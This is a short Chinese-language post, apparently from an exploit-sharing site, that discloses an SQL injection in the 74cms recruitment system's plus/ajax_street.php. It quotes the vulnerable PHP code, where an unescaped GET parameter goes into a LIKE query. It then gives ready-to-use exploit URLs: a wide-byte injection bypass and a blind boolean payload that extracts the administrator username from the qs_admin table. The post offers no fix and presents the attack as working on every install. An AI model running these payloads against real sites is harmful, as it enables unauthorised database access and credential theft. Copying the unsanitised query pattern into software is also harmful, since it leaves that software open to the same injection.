骑士cms人才系统 通杀SQL注入

代码出现在plus/ajax_street.php文件中
[php]
43行开始

elseif($act == 'key')
{
$key=trim($_GET['key']);
if (!empty($key))
{
if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0) $key=iconv("utf-8",QISHI_DBCHARSET,$key);
$result = $db->query("select * from ".table('category')." where c_alias='QS_street' AND c_name LIKE '%{$key}%' ");
while($row = $db->fetch_array($result))
{
if ($listtype=="li")
[/php]

利用如下
[php]http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or 1=1%23

http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select admin_name from qs_admin),1,1))=97 as signed) %23[/php]

发表评论